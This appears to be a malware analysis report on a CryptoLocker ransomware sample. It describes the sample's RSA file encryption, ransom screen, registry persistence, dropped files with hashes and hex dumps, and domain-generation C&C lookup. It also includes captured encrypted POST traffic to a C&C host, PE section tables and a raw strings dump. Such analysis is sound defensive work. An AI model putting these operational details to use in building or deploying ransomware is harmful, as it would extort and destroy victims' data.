CryptoLocker is a ransomware trojan. It crypts personal data on the infected machine with a private RSA key stored on the remote C&C. The malware then displays a message which offers to decrypt the data if a payment of 400 USD is made by a stated deadline, and threatens to delete the private key if the deadline passes.

• Virustotal: https://www.virustotal.com/en/file/ef1bf0a5fb87f183f25d580c9bd09d732dbb68e213d3f4c186e6b819aae2ed15/analysis/1397195979/

Cryptolocker will encrypt users' files using asymmetric encryption, which requires both a public and private key. The public key is used to encrypt and verify data, while the private key is used for decryption, each the inverse of the other. Once the files have been encrypted by the malware, the private key is sent to the remote C&C and removed from the infected machine.

Once infected, the malware encrypts all personal data on the computer and modifies the desktop background:

It also shows the following message:

If you click Next, you are prompted to choose between 2 means of payment: MoneyPak (USA Only) or BitCoin.

As indicated by the message, you have approximatively 3 days to pay the ransom to decrypt your files before the key is removed from the C&C.

You can also view the list of encrypted files:

To ensure persistence, the malware inserts following registry keys:

The malware creates a registry key in HKCU\Software\CryptoLocker_038\ where you can see the public key:

Also all encrypted files are listed under the HKCU\Software\CryptoLocker_038\Files subkey:

The malware copies itself to %appdata% and removes itself from the initial location:

C:\Documents and Settings\malware\Local Settings\Application Data\Ljfmutwyfpezfp.exe

It also deletes following file:

C:\WINDOWS\SoftwareDistribution\DataStore\Logs\tmp.edb

It has an unknown type and has MD5 72de1589ff619488bc2d9d72d50defe2. Here is the hexadecimal view of its content:

00000000  78 8b 15 08 ef cd ab 89  20 06 00 00 00 00 00 00  |x....... .......|
00000010  06 00 00 00 00 00 00 00  5e e0 00 00 2e 22 0e 0b  |........^...."..|
00000020  04 72 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |.r..............|
00000030  00 00 00 00 02 00 00 00  00 00 00 00 00 00 00 00  |................|
00000040  00 00 00 00 00 00 00 00  2f 22 0e 0b 04 72 00 00  |......../"...r..|
00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
000000d0  00 00 00 00 01 00 00 00  05 00 00 00 01 00 00 00  |................|
000000e0  28 0a 00 00 03 00 00 00  09 00 00 00 00 10 00 00  |(...............|
000000f0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000120  00 00 00 00 00 00 00 00  6f 00 00 00 6f 00 00 00  |........o...o...|
00000130  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000150  00 00 00 00 20 06 00 00  09 00 00 00 06 00 15 09  |.... ...........|
00000160  0b 71 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |.q..............|
00000170  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000290  00 00 00 00 00 00 00 00  00 00 00 01 00 00 00 00  |................|
000002a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00001000  78 8b 15 08 ef cd ab 89  20 06 00 00 00 00 00 00  |x....... .......|
00001010  06 00 00 00 00 00 00 00  5e e0 00 00 2e 22 0e 0b  |........^...."..|
00001020  04 72 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |.r..............|
00001030  00 00 00 00 02 00 00 00  00 00 00 00 00 00 00 00  |................|
00001040  00 00 00 00 00 00 00 00  2f 22 0e 0b 04 72 00 00  |......../"...r..|
00001050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
000010d0  00 00 00 00 01 00 00 00  05 00 00 00 01 00 00 00  |................|
000010e0  28 0a 00 00 03 00 00 00  09 00 00 00 00 10 00 00  |(...............|
000010f0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00001120  00 00 00 00 00 00 00 00  6f 00 00 00 6f 00 00 00  |........o...o...|
00001130  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00001150  00 00 00 00 20 06 00 00  09 00 00 00 06 00 15 09  |.... ...........|
00001160  0b 71 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |.q..............|
00001170  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00001290  00 00 00 00 00 00 00 00  00 00 00 01 00 00 00 00  |................|
000012a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00002000  00 00 00 00 01 00 00 00  06 00 00 00 00 00 00 00  |................|
00002010  00 00 00 00 00 00 00 00  01 00 00 00 c4 0f 00 00  |................|
00002020  10 00 01 00 03 08 00 00  0e 00 00 00 00 00 00 00  |................|
00002030  01 00 00 00 02 00 00 00  00 00 00 00 00 00 00 00  |................|
00002040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00002ff0  00 00 00 00 00 00 00 00  00 00 00 00 10 00 00 00  |................|
00003000  00 00 00 00 02 00 00 00  06 00 00 00 00 00 00 00  |................|
00003010  00 00 00 00 00 00 00 00  01 00 00 00 b6 0f 00 00  |................|
00003020  1a 00 02 00 23 08 00 00  00 00 00 00 00 00 00 00  |....#...........|
00003030  00 00 00 00 00 00 00 00  04 00 00 00 00 0e 0e 00  |................|
00003040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00003ff0  00 00 00 00 00 00 00 00  0a 00 10 00 10 00 00 00  |................|
00004000  00 00 00 00 03 00 00 00  06 00 00 00 00 00 00 00  |................|
00004010  00 00 00 00 00 00 00 00  01 00 00 00 b6 0f 00 00  |................|
00004020  1a 00 02 00 23 08 00 00  00 00 00 00 00 00 00 00  |....#...........|
00004030  00 00 00 00 00 00 00 00  04 00 00 00 00 0e 0b 00  |................|
00004040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00004ff0  00 00 00 00 00 00 00 00  0a 00 10 00 10 00 00 00  |................|
00005000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00010000

3 copies of the same file (XML file, renamed randomly with a *.tmp extension) but with different names are created and deleted in %homepath%\Local Settings\Temp\:

• %homepath%\Local Settings\Temp\LLO34EC.tmp
• %homepath%\Local Settings\Temp\OEDE1C4.tmp
• %homepath%\Local Settings\Temp\UBA2B48.tmp

They all have the same MD5sum (8820c7d6e6ee359cacfa5a232c663a38) and have the following content:

<?xml version='1.0' encoding='UTF-8' standalone='yes'?><assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'><dependency><dependentAssembly><assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*'/></dependentAssembly></dependency></assembly>

The following file (unknown type, MD5sum: a45a21f762474ee71748b2833ff07f51) is also deleted:

%homepath%\Local Settings\Temporary Internet Files\Content.IE5\RHF2GBN1\home[1]

Here is the hexadecimal view of the file:

00000000  60 a7 70 91 8f c8 c7 9a  19 83 b8 a9 35 4a ab e1  |`.p.........5J..|
00000010  a2 7a f7 c4 5f 62 47 66  7c c8 0f 50 e3 57 3f 91  |.z.._bGf|..P.W?.|
00000020  2e 32 f7 86 2f 66 c8 c3  44 6d 6c 6f 0e 1b 20 e2  |.2../f..Dmlo.. .|
00000030  ad 58 e9 3f 42 58 98 55  42 22 1e 51 c9 46 48 6e  |.X.?BX.UB".Q.FHn|
00000040  ce dd 6a 47 c0 7a f9 03  86 36 d5 ef 0d 95 99 64  |..jG.z...6.....d|
00000050  78 32 90 ff 8f c0 8d c4  26 5f c0 32 65 d9 02 5b  |x2......&_.2e..[|
00000060  06 10 a7 94 e8 27 06 8f  5c 05 49 d1 15 a2 90 a6  |.....'..\.I.....|
00000070  63 78 d2 01 77 e6 73 8a  72 d9 e4 37 8e 4a 17 f1  |cx..w.s.r..7.J..|
00000080  37 b8 da e9 7d 2d f0 89  af 4c ae 07 59 30 94 73  |7...}-...L..Y0.s|
00000090  b5 9a 54 d5 6a 2f 1f 1c  46 5a 48 6e 1b 86 6c 65  |..T.j/..FZHn..le|
000000a0  47 97 7a f5 c0 d5 df 33  9a 74 22 06 da 65 f7 8a  |G.z....3.t"..e..|
000000b0  ee 54 6b 7f 82 ba de ca  87 58 2b 2e ae c7 09 c7  |.Tk......X+.....|
000000c0  ad 0e bc be dc ed 31 33  48 3e 10 35 63 15 35 d5  |......13H>.5c.5.|
000000d0  0a 6b 6a b8 80 4f 40 5f  b6 35 fb 87 5b 19 32 a3  |.kj..O@_.5..[.2.|
000000e0  ec 45 dc ef e8 5a 6e 5c  11 fc c7 db dc 8c 17 4d  |.E...Zn\.......M|
000000f0  ec 9e 8c b2 31 60 a8 af  b4 f4 c1 6e a6 8c ca ef  |....1`.....n....|
00000100  bb 7a 86 ca a9 1f 0f 38  72 54 23 03 f7 eb fa 9b  |.z.....8rT#.....|
00000110  02 cd e1 7f a8 b3 f6 55  22 44 8f 46 92 77 63 7c  |.......U"D.F.wc||
00000120  37 4d de 9f c7 0a d2 7b  f7 7b 8f 5a dd d9 ce 60  |7M.....{.{.Z...`|
00000130  9b 12 27 63 34 d1 3b f9  c4 fa 4c 61 98 38 af cf  |..'c4.;...La.8..|
00000140  03 33 15 ca cc 55 5d 0b  81 0b 75 91 10 b1 8a b4  |.3...U]...u.....|
00000150  70 0c ed 00 4f 7c 0e 94  6b 5d 15 94 89 e6 1e 02  |p...O|..k]......|
00000160  05 a8 84 bd 3e ed 2e a1  6f 0c 86 ef 1e 56 47 8f  |....>...o....VG.|
00000170  75 f5 7c 3d 1d fc 3b ff  92 4e 5b f3 23 06 19 f1  |u.|=..;..N[.#...|
00000180  d6 90 5f 87 65 17 04 c5  5c fd 67 fb 68 09 ad f4  |.._.e...\.g.h...|
00000190  69 17 4f 61 10 5e d9 fd  65 6b 3d 1a 92 3b 3c bc  |i.Oa.^..ek=..;<.|
000001a0  18 41 0f e1 f0 44 6b 1d  73 40 61 34 0e 76 20 97  |[email protected] .|
000001b0  2a f7 ac 33 56 06 69 64  cf 52 02 b7 10 2c 22 0b  |*..3V.id.R...,".|
000001c0  58 9f 73 d8 24 f1 63 03  d4 f0 08 cb 6e ea bf 63  |X.s.$.c.....n..c|
000001d0  99 e3 61 4d 0e 53 dc 95  a9 ca c4 48 19 84 ae d1  |..aM.S.....H....|
000001e0  f0 47 45 ad fa 2d a8 2e  a5 b3 0b 00 1d ab 3e 0b  |.GE..-........>.|
000001f0  d9 6c 5d e8 5a b8 7d 8c  50 d5 7f 8a 32 1c 10 91  |.l].Z.}.P...2...|
00000200

The malware produces a list of random-looking server names in the domains .biz, .com, .co.uk, .info, .net, .org and .ru and then tries to make a web connection to each of these server names in turn, trying one each second until it finds one that responds.

During the analysis, the following remote C&C was successfully reached:

When the working C&C is found, it sends a unique machine ID and receives the public key for file encryption. All the communications between the infected machine and the remote C&C are encrypted as well.

POST /home/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: xmpwxyspnmvbh.net
Content-Length: 192
Connection: Close

...8J..$.r.."b.F......HO.Z..%..<......TX.<6...0..o4.89..23..
H5?........@
.+..6#:..1..Y...Hp...;6./..w....H.9b...>.. ....]..:K..V...j.Y6I1..d&..RGF......U...J6&K..F..AAmN....z.S.kQ.b.;E/.3....HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Fri, 11 Apr 2014 08:43:28 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: close

200
.............X.....U.z...Q......=....";.......3...i...."(;-.....#....&I.rD(WQ.tH..a...e.".@..
{...p...G..X.F..\~....T..O.A....9...Y...Y.=.R7....~.......)I..9..B..W..i.......H~>...Q....*....8N..v~..1s.)A.`.....L..........R.....4$|...
.z.......V...H.2..%..^..~u.-.-.....n..3.,W....F..l"c.......Z3..z.......;..3..R..X.....H..Hm<.n..Y@.._...a...)..s...?.....r..&.G...........-.1..J...Pw...}.....`e.0W.3....B.,.....6.n..
|...g.....G...7fA./.../..#U..!...b..#.T.I...Z...~W.......c^i..j[......ln~%.t..^V..~.........^...D
0

POST /home/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: xmpwxyspnmvbh.net
Content-Length: 208
Connection: Close

.k.....-e..s.........@=....g.N..s.>..N0..Jx..c..$.C.[...,7..3.f..7p.I*P.4......[s..i..$.n.qzQ..B.k......*.........d.R5..T..)G......r..
T...C.!.+...C2.V............i....I..q.og.A.2|.X).......1.. ..D..YsGD.)..YHTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Fri, 11 Apr 2014 08:43:41 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: close

10
.....r..VZ..?8..
0

Name       VirtAddr     VirtSize     RawSize      Entropy     
--------------------------------------------------------------------------------
.text      0x1000       0x1080a      0x10a00      6.605219    
.rdata     0x12000      0x316d6      0x31800      6.354802    
.data      0x44000      0x66644      0x51a00      4.556674    
.rsrc      0xab000      0x542e8      0x54400      4.386447

Name               RVA      Size     Lang         Sublang                  Type
--------------------------------------------------------------------------------
BIN                0xab490  0x50370  LANG_ENGLISH SUBLANG_ENGLISH_US       data
RT_ICON            0xfb800  0x25a8   LANG_ENGLISH SUBLANG_ENGLISH_US       data
RT_ICON            0xfdda8  0x10a8   LANG_ENGLISH SUBLANG_ENGLISH_US       data
RT_ICON            0xfee50  0x468    LANG_ENGLISH SUBLANG_ENGLISH_US       GLS_BINARY_LSB_FIRST
RT_GROUP_ICON      0xff2b8  0x30     LANG_ENGLISH SUBLANG_ENGLISH_US       MS Windows icon resource - 3 icons, 48x48, 256-colors
RT_VERSION         0xab1a0  0x2f0    LANG_ENGLISH SUBLANG_ENGLISH_US       SysEx File - IDP

LegalCopyright: (c) 2009, AccessData Group
InternalName: Paragraphleg
FileVersion: 1.1.929.885
CompanyName: AccessData Group
LegalTrademarks: Paragraphleg\xae
ProductName: Paragraphleg
ProductVersion: 1.1.929.885
FileDescription: Paragraphleg
Translation: 0x0409 0x04e4

j@PQ
= "A
_^][Y
PPPP
t$ P
9t.9Q
QQSV
YYt9
QWSP
_@[^
F(@@;F,v
;F,v
j$Y3
hh+A
50!A
hT+A
tph@+A
t_h0+A
VWu*
=4#A
SVue
;(rWV
PVj0
54#A
s$_r
=@"A
tS9W
tS9W
VWvB
_^[]
t	VP
u.;5
LSVWj
=hyI
=hyI
=,!A
8MZu
QQSVWd
PtYY
SVWUj
]_^[
t.;t$$t(
Y_^[
VC20XC00U
SVWU
tYVU
t?xH
]_^[
wLVWP
FVWS
h(3A
h83A
xd;=<MD
-_^u
WVS3
p`;5
[_^]
Wj@3
 t6S
    
hH3A
hX3A
=xyI
ht3A
hd3A
u,hT`@
u79=
ht@D
uiSj
@_^[
j?^;
<Yv"
h`7A
QSVW
~\u	
t$<"u	3
5`yI
0<=t
5`yI
>=Yt
t7VP
5`yI
Y]_^[
8"u&
QQSVW3
SUVW
tyf9
SSS+
@PVSS
t#SSUP
t$$VSS
_^][YY
YYt.
_^][
YYt-V
9x,t
	9x4t
	9x0t
	9x@t
VWhl2A
50!A
h 8A
=8|I
h/a@
YYt+V
h,8A
h`7A
t&:a
8csm
Yt	V
5H|I
YYu"
8csm
8csm
~=;F
>csm
h :A
sVS;7|B;w
;csm
>csm
;csm
YY_^[
8csm
u,9x
@_^]
^_[3
h0:A
u:Vj
u%9=
F<W3
F,98uX
9P,t
9P4t
9P0t
9P@t
80t.
Wj0S
_^[]
u8SS3
9] u
E SS
t-9]
t!SS9]
9] u
PPPPPPPP
PPPPPPPP
h8=A
t$hl2A
VWumh|2A
50!A
hx=A
h\=A
hD=A
A#D$
= RD
= RD
v	N+D$
;5,SD
;A t
;p$t
;5HSD
PPPPPPPP
9~(~
VWj Y
SVWj ^
h`SD
hxSD
PPPP
PPPP
@PWV
_^[]
_^]t
6PWS
t WW
WWWWVSW
tCVj
t2WWVPVSW
HHtjHHtF
=(~I
=$~I
=,~I
= ~I
VWsX
~'WP
h(DA
tVPV
t/9U
+t"HHt
9~DO
	j	XO
HHu&
u	9}
hXDA
u.hPDA
hHDA
h@DA
h`DA
hpDA
t@VW
%0"A
%,"A
=hVD
t3SW
C ;C$
tC<Et?
t99\$
_^[]
_^][
u/9F
SSIQ
=@#A
=D#A
=4#A
E W3
SVux
u>9E
^[_]
=L#A
t59~
u09=`\I
9=`\I
5`\I
QSVW
QQSVW
F,L-A
tMVW
>(r-
8SVW
5$!A
Ph(/A
Q$_^
Q(_^
Q,_^
Q0_^
Q4_^
Q8_^
Q<_^
A$VW
Q@_^
QD_^
QP_^
QT_^
QX_^]
A$VW
Q\_^
Qd_^
Qh_^
Qh_^
tTh8/A
F,L-A
SVWu
S\_^[]
SVWu
S\_^[]
@O@u
SVWj(3
tLShD
hl'A
@_^[
0SVW
t39w
9w u
^8tI
t7j0
=X#A
9~Lu
9~Lt
9~Lu	P
=$#A
=(#A
4SVW
9GHt	
t	9p$u
9Htu
t ht0A
@t	V
@uESW
@SVW
btZ-
=@yI
u;j0^V
YYtVj
=|"A
=L#A
u(;C
_^[d
VwltB
r0=8
97_u
Rh`/A
h(/A
h(/A
tLShD
FpW3
uG9~
F(Wt
)SS+
V,RW
QQSV
F,+F(_;E
^[s	j
^(_^[]
=D A
=@ A
=L A
=P A
=< A
=0 A
=, A
=( A
=$ A
=  A
tLShD
h@1A
tLShD
=4 A
=4 A
@t	V
<A|2<Z
.<9~
1GG;E
CGGC
<A|@<Z
<<9~
1FF;E
t)PW
_^[]
u@Vj
QQSV
QQSVW
~A;{
QSVW
=H#A
=0#A
h`\I
=x^I
=x^I
_j X;
Q$_^
Q(_^
Q,_^
Q0_^
Q4_^
Q8_^
Q<_^
9M u
Q@_^]
QD_^
QP_^
QT_^
QX_^]
Q\_^]
Qd_^
h80A
%H"A
CInvalidArgException
CNotSupportedException
CMemoryException
CException
COleException
DISPLAY
CObject
Delete
NoRemove
ForceRemove
CMapPtrToPtr
CArchiveException
CCmdTarget
CWnd
AfxOldWndProc423
AfxWnd70s
AfxControlBar70s
AfxMDIFrame70s
AfxFrameOrView70s
AfxOleControl70s
EnumDisplayDevicesA
GetMonitorInfoA
EnumDisplayMonitors
MonitorFromPoint
MonitorFromRect
MonitorFromWindow
GetSystemMetrics
USER32
qInitCommonControlsEx
COMCTL32.DLL
F`/A
HtmlHelpA
hhctrl.ocx
#32768
commctrl_DragListMsg
CByteArray
CMenu
CGdiObject
CUserException
CResourceException
kernel32.dll
user32.dll
CorExitProcess
mscoree.dll
runtime error 
TLOSS error
SING error
DOMAIN error
R6029
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
R6028
- unable to initialize heap
R6027
- not enough space for lowio initialization
R6026
- not enough space for stdio initialization
R6025
- pure virtual function call
R6024
- not enough space for _onexit/atexit table
R6019
- unable to open console device
R6018
- unexpected heap error
R6017
- unexpected multithread lock error
R6016
- not enough space for thread data
This application has requested the Runtime to terminate it in an unusual way.
Please contact the application's support team for more information.
R6009
- not enough space for environment
R6008
- not enough space for arguments
R6002
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program: 
<program name unknown>
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
Program: 
A buffer overrun has been detected which has corrupted the program's
internal state.  The program cannot safely continue execution and must
now be terminated.
Buffer overrun detected!
A security error of unknown cause has been detected which has
corrupted the program's internal state.  The program cannot safely
continue execution and must now be terminated.
Unknown security failure detected!
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
e+000
GAIsProcessorFeaturePresent
KERNEL32
 (8PX
700WP
`h````
ppxxxx
(null)
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
InitializeCriticalSectionAndSpinCount
GetProcessWindowStation
GetUserObjectInformationA
GetLastActivePopup
GetActiveWindow
MessageBoxA
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
July
June
April
March
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
1#QNAN
1#INF
1#IND
1#SNAN
=L9o<
Invalid DateTime
Invalid DateTimeSpan
ForceRemove
NoRemove
Delete
AppID
CLSID
Component Categories
FileType
Interface
Hardware
Mime
SECURITY
SYSTEM
Software
TypeLib
KzIi
En1^
SIsHj
rq~e^
#[1=v9
b2|,
3PvY
"Vh!
@XRD|
"M]R
	XZ)Br
A8m5
B^h-
;sd#?
1]R	
kI@sE
<n'jf
Z.Y?
@\&c
Q$ji
IZ.]
	F*#c
quj\
8oib
@z;1
jT%<b
HCI-
!=^J
i@a|
`aoc
'HnXs
OaGn
 rZu
@ as
Z:aB
C7{<
RR}4
6b9F 
8B~X
 :8T
f0we
q!Qu[
Hioe
w@fq1E
FNqQ
oZ(e
qeHL
o`?|-1!<
	hdLyJ
tgE 0
(VWq
	Fw3
&[$2
v	l)
4E@N
=EC]
2q\v
0W=I
J2H%
fqqjL
nJqe0f
??GT^
MRs^
w lr
'!bRA
WVo`:
:8CM
e=@3
on*4
#l?3
eWeq<
K2Mq3
WSm 
weg{
ZrE5y
 lWQnII
Z}yA*
M\uE
[A#8
AfFa
jj+=3
WR30
W,kI
GFSV
VF7n
lVQe5
-qv0
' rxf
62re
WUqW0 
b%xe
wINfM
HimV
n;yW/[
Gl%W
YR4DL
OzLEl
$u[[
 s(7d
[843
ew3 
]0~"W
5Y$9
03I~h
L6fY
S$$E]
#6]L
VW#j
	O*8
D6lq
0e"~O
]k=QZ
DGP'
 jOi(I
^P!~K
(V&fL
Kg9V
WNvB
8CLu@
!F6b
k4L|3
w92 
V/+,
Y/XBa!
$6AX
 ZvD
Z2JF
e$OC
$J`d
bFF8
te_!
H7S^d
qwLx
ujwI
wh1/
bj,=
N[eV
G_I 
3W$	
h]SC
E%1$uL
	>1W
0_7W
}<R]
bnxq
XER<
WigY
wqq[
 q	]
+/q9
;mg7Uv
ffe]
. ,h
I\S 
4GhA
rW|<
9Z8/
=sjc
5#aBi_
dReq
qwIWO
DLWf
EU$S
PDMf
_OA1$
Cb5ww
fwf4q
hZ_	
vni~5Kq
-8+?
`t4kyD
^yVy0
eWmR
IJX:
I,)z
y3ht
$t]S
3`kr
w>+%
%nc^V
y1Oe
hQE\
}dV]
T)!_
g?TDZ
$,]$
C$DH
+Z_H
vfOD
a*Ff
!O	c
WbM?
NwIw
dp$#
f71i
UO^p
{M=G
>zWW
m!qW 
;dfq
0Q[*
d/Q4
R}nh6
e }E/
eU1N
!Tv`
Iz	L
"6+L
A<_Q
S0[Z
wI<Y
MD~,S
VG*x
LC`:
pwz\
#n;R
{XCX
L(bns
RkRx
L#Bd
9DZd
H;(b
ji_?
(0"4
eV\Q
w9Kma
kp W
xh]C
8{_ 
[RP$
0I7h
:PSe
1)G8q
T$$}@
.O@	
*b I
U7CT
R!%W
I}uq
e{G&
) )V
=FFe
"(a{@W
wwc=
q   5>
99N{yl
WqG$
UW6R
a#%dp
qDG^
-X@+
<2Kw
LccNA
7ju5
^%^c
FU=7
aQ@ O
q.W#
)Fh-h]
qqwW
,N"W
[dV~
1QPm
Ljx|
GeS_frf
WV3|>
Ve3W3
WFKJ
d|%L
i"fW
3[7e
tkN,
Z2@i
<6/%
CPpv
1$$t
,)i$
qe I
w L{
+P_0lYJ@E
6ALEk
0b>!
X<C|
LW3S
{t~y
nx]F
wq9>
LT`A_
,u	W
WWL*
Z#FX
`8X	o
f*slA
`kY_
)G|D
#mt?
c.mm
\?J!+
{#>a
$F^a
kLII
$sA$
Qf]$
M>#1Nk9^MVs
eLa*
WLww
m\D$
e;v2
 ISV
IWS!
eofI
fLUf
:$kX
OQrR
wI t
V  H
wfW6B
2`*S
|QkAv
r,RT
@;CP]
.qWq
+6hu
L"$v
p'9p5
R>PfV
m	cOWt
e3G&
Lg^Z
gHj=
UD|1
%pt 
Xeww
sD(b
V~D$e
Xu*0WOz
If:}
[_Iw
VNI9
:I)q
Wq#A|
poq3wW
W3WW
qQPs
}\rB
W7e&
_!#0
oK5Yr
ih3C
$*+q
\:0MH
33w0
HO-R
WfS{
Ky%q
[4OV
W,A\
1=5s
PIUF
anq 
L M4
 yxI
o,vCII
Ata3!
eWeI
r%hQ
qIVH
u@8Q<
b}QBs
B)*L
Zrs|
Z_gi
w~]F
z<Ww
3&I^
3wWw
~"Rw
lex+
@Ga[
mq30
48l9
0W21
v4AZ
4h>rL
:CPW
YE1r
Y$]^[
5C<`~r
N@ SX
alMv
q\Yy
.z&6 
W-m]
4uhl
w/,e
]/{w
wqw,
U]f\
~.vI
$K,%$N
 -OV
G&/ev,
>xPQ
9~:V
T_K]Og
kw8V
I%r'
Y79W
DW|_y
K_2.0
(xM&
<o'e
B_L3
f=5w
qqq 
fqb[Ew
q*&G`
1mDLef
qOyC^Vr
,ke;
3l6e
uS3X
1V^:
6:t0
w0P{
qpbN^
oh]h
$}pu
^W_/
WWVIL
xTZ_
V{U'
[.J*
wfL3
0w4.
aF:0
bb\*
jT|T
Q,<e
$w"f
>KQo
3VRp
'+uG
HWf0
iDc@h
0q#c
)g5!!
Czh3
StJ_
qwZf
z<9$
,lltW
I6kJ
!v;L
'W&A)
4{lq
qIeW
lVzJ_
@9DA
9J4~#
")Mu}
mwwfV
)k]L
*]p,
P"Bq
9x}+
VIeu
.g~[
C[[W
,_8;Tq
BS$~T
qwI7
BI I
IVXD
<%.'
74pV
C$Mu
ffV[
Y.p.
f3qL
Q'*w3
v-@+
0WWW
5=bu1
F4kmg
G<0;
:{|4
FSPr
3N.6
,me0
wVj=
qe!!
  (u
M*JN,
+B9VV
Cq e
0h{0
WR @
2O=W
$ASlDQ$_
SWW3L
t}gn
r9Q2
EW 0
bQq5
3>e 
j$uU
*U6z
Ro&P
qZ^L
/`3W
tA]EU
27z6t
b	[7
Ac-g
WmKI
_M+g
X:/<VA
VqWI
NCcW
&NIW
VD\m
Vdfw
'@B\
#(wq
pi?N
?"pp
0hj6
S	H?g
SHrA
0eUEX0
3(,&
W0BY
7GuH
9_F)
*S]#
wz I
U:<t
Y33J
jKZw
VMdBR
]<k?
	Pa|V
#+Ls
LDSV
(#HW
q3H|>
wqhU
tUCE
$$>C
	c]$
wISj
'nx$
euM^@k
YQX1
TK 9v=
wILe\
R68r5_
jTyq
WeeV
@;"T
- `H
IVI2
 (?1
@rAW
$A,Q
W0_>
WIL`
wW0@HJJ
Wq8y
*^9,
qfqf
NgQ3
?5rZ
e=CP
]dQw
aBL 
;;z-
KSuQ
L~Is
r#$o
npD*
W3}d
ePWy
5I7Cs
rOh;W
]"{(
wW4m
11d	f
I	>;M
rIl#^
mLUi
Ww3MI
3Vu9
I6$qV
P`]/
qXN{
\KeW
)NT~
SH JbL[
`HLO1q
qa,u
f2'w	qb
WW'hQN
t:m*
plaO
?42[O
VIr'
TUX$
cZqs
fu;}
[#xw
Y=@ bc
ihjF
 Y:`
_)63
vPBW
{l.XAb
)FNN
E#?W
#P:L
0L]t
V{w 
4iK\
qb^A
\#ec
BWo5
1zf 
[[qq
qVpXo
uZ0k
^*cv
p$bE
I=7o
%3h0
IMgsY
"cqoD
Xq3q 
e,t7T!
f:Nd
)^(\
VAu8\V
IffI
wh[Ff
.k1j
7fzQ
|&3 
O[YM
T&P4
b6<W
7v`D.
W)_v
R?8)"#
fwbb
eWL@X
*ceCQ
 P9^
w=T	
&k) 
D$E#
fIgq
nHK+
W'`3
d1j`
[JJ[
2yO,Sn
dEM8
J,{L
h%(.V
<F8d	
mBux
e6iq
qW0f
LB##
PA@E
W^j"
@[<@
4lA#
47dy
8Dzp
!Qw 
*-Z"1Z5
^"b-|
VIIf
U0-j
AIz	;f
*8zfw
\a6N
3-Re
w:1ke
Das?;
L=#~
fwLW
V0qpP/3
ef2uU
q\$t
W^!"
}\Jr
WBnu
60)_[W
0Mqf
~D}I
i3-v
V$[5
/yeq
'gkK4O
qPeVV
?u0;
Ay`I*
[1iM8
wS7+
3(Z#
p8jgmO
`oL0
D_It
NVD}
pw2h
`z9b
#Shs
wq0L
#E2 
LjIV
Wg)8
2Xv|
_!Z+
!o%4i
 fI0
VD!s
F%pH'
`]7.
ngFn
30 	
fWq3
a+wq
[(U5
%D$<
v%8LA
1A0$
$$u$
I V#Em
)E6a
`/_Lq
W=GM
A	z3
Do- ]
Rz@W
V^[<
WL=00
Ir0O
EIwq
Cr]C
Wh[.L
0Vfe
I/Pbv
+ oc
@ul@
RSDSZ~
d:\Sharp\pattern\women\branch\Skill\Shoe\oil\Warm\yearSelect.pdb
GetNativeSystemInfo
lstrlenA
PeekNamedPipe
GetLocaleInfoA
MoveFileExA
FindCloseChangeNotification
GetCurrentThread
InitializeCriticalSection
WideCharToMultiByte
GetEnvironmentVariableA
GetACP
MultiByteToWideChar
RaiseException
InterlockedExchange
GetLastError
lstrcmpiA
GetThreadLocale
PrepareTape
ResetEvent
OpenMutexA
FindNextChangeNotification
FindFirstChangeNotificationA
CreateMutexA
VirtualProtect
GetFileTime
DeleteCriticalSection
DuplicateHandle
GetVersionExA
GetVersion
GetCurrentProcessId
DeleteFileA
lstrcpynA
SetLastError
LocalFree
FormatMessageA
GlobalUnlock
GlobalLock
GlobalAlloc
SizeofResource
LockResource
LoadResource
FindResourceA
GlobalFree
GetModuleFileNameA
LocalAlloc
LeaveCriticalSection
GlobalReAlloc
GlobalHandle
EnterCriticalSection
TlsGetValue
TlsAlloc
TlsSetValue
LocalReAlloc
TlsFree
InterlockedDecrement
InterlockedIncrement
CloseHandle
GetCurrentThreadId
lstrcmpA
GlobalFlags
GetProcAddress
GetModuleHandleA
lstrcmpW
lstrcatA
FreeLibrary
LoadLibraryA
GlobalDeleteAtom
GlobalFindAtomA
GlobalAddAtomA
GlobalGetAtomNameA
lstrcpyA
GetCPInfo
GetOEMCP
WriteFile
SetFilePointer
